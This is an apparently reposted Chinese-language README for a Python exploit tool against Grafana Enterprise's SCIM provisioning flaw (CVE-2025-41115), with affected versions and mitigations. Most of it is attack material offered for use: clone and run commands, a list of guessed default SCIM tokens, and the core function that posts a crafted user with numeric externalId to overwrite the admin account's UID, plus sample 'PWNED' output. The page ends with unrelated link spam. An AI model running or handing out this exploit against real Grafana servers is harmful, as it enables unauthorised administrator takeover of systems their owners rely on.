当前位置: 首页 > news >正文

Grafana Enterprise SCIM漏洞利用工具(CVE-2025-41115)

Grafana Enterprise SCIM漏洞利用工具(CVE-2025-41115)

项目描述

这是一个用于演示和验证CVE-2025-41115漏洞的Python利用脚本。该漏洞是Grafana Enterprise中一个关键(CVSS 10.0)的安全漏洞,影响其SCIM用户配置功能。当攻击者能够向SCIM端点发送请求时,可以通过数字externalId参数覆盖现有用户的内部UID,从而实现权限提升管理员账户接管

⚠️注意:此工具仅供授权安全测试和教育用途。未经授权测试他人系统是非法行为。

功能特性

  • 自动化漏洞检测:自动尝试多个默认/泄露的SCIM令牌
  • 一键利用:只需提供目标URL即可尝试攻击
  • 实时反馈:清晰显示攻击结果和响应信息
  • 安全绕过:自动禁用SSL证书验证警告
  • 多令牌支持:内置多个可能有效的默认令牌
  • 时间戳防冲突:使用时间戳生成唯一攻击者邮箱

安装指南

系统要求

  • Python 3.x
  • requests
  • 网络访问目标Grafana实例的权限

安装步骤

  1. 克隆仓库
sudogitclone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.gitcdBlackash-CVE-2025-41115
  1. 安装依赖
pipinstallrequests
  1. 设置执行权限(可选)
chmod+x CVE-2025-41115.py

使用说明

基础用法

# 针对HTTP目标python3 CVE-2025-41115.py http://target.com:3000# 针对HTTPS目标python3 CVE-2025-41115.py https://grafana.company.com

攻击流程

  1. 脚本会尝试以下SCIM令牌:

    • 用户自定义令牌(需手动修改代码)
    • 默认泄露令牌(多个常见默认值)
  2. 如果攻击成功,输出将显示:

    • 使用的有效令牌(部分)
    • 创建的恶意账户凭据
    • 完整的API响应(包含被覆盖的UID)
  3. 成功后,可以使用创建的邮箱地址和任意密码登录为目标管理员。

预期输出示例

[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000 [*] Trying default/leaked tokens + your token... [+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx... [+] Login as: rooted1732212345@pwn.lab (any password) → you are now Admin! [+] Full response: { "schemas": [ "urn:ietf:params:scim:schemas:core:2.0:User" ], "id": "1", "externalId": "1", "userName": "rooted1732212345@pwn.lab", "name": { "formatted": "Pwned User" } }

漏洞条件

目标必须满足以下配置:

  1. SCIM功能启用:enableSCIM = true
  2. 用户同步启用:[auth.scim] user_sync_enabled = true

核心代码

主利用函数

deftry_exploit(token):headers={"Authorization":f"Bearer{token}","Content-Type":"application/scim+json"}payload={"schemas":["urn:ietf:params:scim:schemas:core:2.0:User"],"userName":ATTACKER,"externalId":TARGET_UID,# 关键参数:数字ID会被错误映射为内部UID"name":{"formatted":"Pwned User"},"emails":[{"value":ATTACKER,"primary":True}],"active":True}try:r=requests.post(f"{BASE}/api/scim/v2/Users",json=payload,headers=headers,verify=False,timeout=10)ifr.status_codein(200,201):print(f"[+] PWNED with token →{token[:20]}...")print(f"[+] Login as:{ATTACKER}(any password) → you are now Admin!")print(f"[+] Full response:{json.dumps(r.json(),indent=2)}")returnTrueelif"Unauthorized"inr.textorr.status_code==401:returnFalseelse:print(f"[?] Unexpected response{r.status_code}:{r.text}")returnFalseexcept:returnFalse

默认令牌列表

# 内置的默认/泄露SCIM令牌列表DEFAULT_TOKENS=["glsa_11111111111111111111111111111111_11111111111111111111111111111111","glsa_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","glsa_00000000000000000000000000000000_00000000000000000000000000000000",TOKEN# 用户自定义令牌]

主执行逻辑

if__name__=="__main__":iflen(sys.argv)!=2:print("[!] Usage: python3 CVE-2025-41115.py http://target.com")sys.exit(1)BASE=sys.argv[1].rstrip("/")print(f"[*] CVE-2025-41115 → Targeting{BASE}")print("[*] Trying default/leaked tokens + your token...")# 依次尝试所有令牌fortinDEFAULT_TOKENS:iftry_exploit(t.strip()):sys.exit(0)print("[-] All tokens failed. You need a valid SCIM token (or the target is patched).")print(" Get one from: Admin → Authentication → SCIM → Generate token")

攻击者身份生成

# 使用时间戳生成唯一的攻击者邮箱,避免冲突ATTACKER=f"rooted{int(time.time())}@pwn.lab"TARGET_UID="1"# 目标UID,通常为管理员账户

受影响版本

版本状态
12.0.0 - 12.2.1❌ 受影响
12.3.0✅ 已修复
12.2.1(修复版)✅ 已修复
12.1.3✅ 已修复
12.0.6✅ 已修复

缓解措施

  1. 立即升级:更新到Grafana 12.3.0或已修复的维护版本
  2. 检查配置:如果不使用SCIM,确保enableSCIM = falseuser_sync_enabled = false
  3. 审计日志:监控意外的用户创建和权限变更
  4. 信任边界:仅允许可信的身份提供商访问SCIM端点

免责声明

本工具仅用于授权安全测试教育目的。使用者需确保:

  • 仅测试自己拥有或获得书面授权测试的系统
  • 遵守所有适用的法律和法规
  • 对使用此工具造成的任何后果承担全部责任

建议所有Grafana Enterprise用户立即检查并应用相关安全补丁。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ5ChaGK4dzijQQbdG477RY9
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

http://www.jsqmd.com/news/356025/

相关文章:

  • 2026年2月PVD设备厂家最新推荐,镀膜设备全产业链能力与品牌口碑深度解析 - 品牌鉴赏师
  • 【小程序毕设源码分享】基于springboot+小程序的涪陵区特色农产品交易系统小程序的设计与实现(程序+文档+代码讲解+一条龙定制)
  • 有你!我的git有救了
  • 700cc外卖配送费怎么减?美团省钱攻略大揭秘! - Top品牌推荐
  • 在工业视觉检测、设备智能监控等场景中,C#上位机凭借其稳定性强、硬件对接便捷的优势,成为工业控制系统的主流开发语言
  • Windows版Redis本地后台启动 - 详解
  • 聚焦“值类型 vs 引用类型”在高频采集、实时监控、长时间运行中的实际影响
  • 2026年2月磁控溅射镀膜设备厂家最新推荐,镀膜设备环保性与产能数据多维透视 - 品牌鉴赏师
  • CoCo都可全国“薅羊毛”攻略:美团平台多重优惠,省钱秘籍大公开! - Top品牌推荐
  • CoCo都可全国无门槛红包怎么领?解锁美团超值饮品攻略,一杯咖啡仅需6.9元起! - Top品牌推荐
  • Costa Coffee 暖心之选,美团红包大揭秘:多重优惠,省钱攻略一网打尽! - Top品牌推荐
  • 在CUDA中使用汇编语言
  • CoCo都可全国点单攻略:美团“拼好饭”与“半价周末”,一杯饮品省下半杯钱! - Top品牌推荐
  • CoCo都可外卖配送费减免攻略:美团平台超值体验,省钱又省心! - Top品牌推荐
  • 玩转1点点,美团APP薅羊毛攻略:省钱秘籍大公开! - Top品牌推荐
  • stl 右引用
  • CoCo都可新年红包大揭秘:美团平台,高面额红包与超值优惠,让你新年饮品不停歇! - Top品牌推荐
  • 一个普通煤矿工人的一生
  • 为什么 goroutine 比线程轻?
  • 已有安全措施确认(上)
  • 薅羊毛攻略:1点点奶茶怎么喝划算?美团活动揭秘,省钱吃到飞起! - Top品牌推荐
  • N32CUBE生成的代码缺少时钟配置,导致I2S不工作解决办法
  • 【小程序毕设全套源码+文档】基于Android的“康益”健身助手的设计与实现(丰富项目+远程调试+讲解+定制)
  • 1点点怎么点更便宜?美团“拼好饭”和“半价周末”让你省钱又省心! - Top品牌推荐
  • 破阵阁aaa
  • 实用指南:Spring Boot 集成 mybatis 浅析
  • N32H473REL7 使用GPIO模拟I2C配置 HTM1650
  • Uniswap_V3
  • 奶茶自由不是梦!1点点无门槛红包轻松领,美团超值优惠让你喝到爽! - Top品牌推荐
  • 2026年2月工业多聚磷酸公司推荐,专业智造与质量保障化工行业之选 - 品牌鉴赏师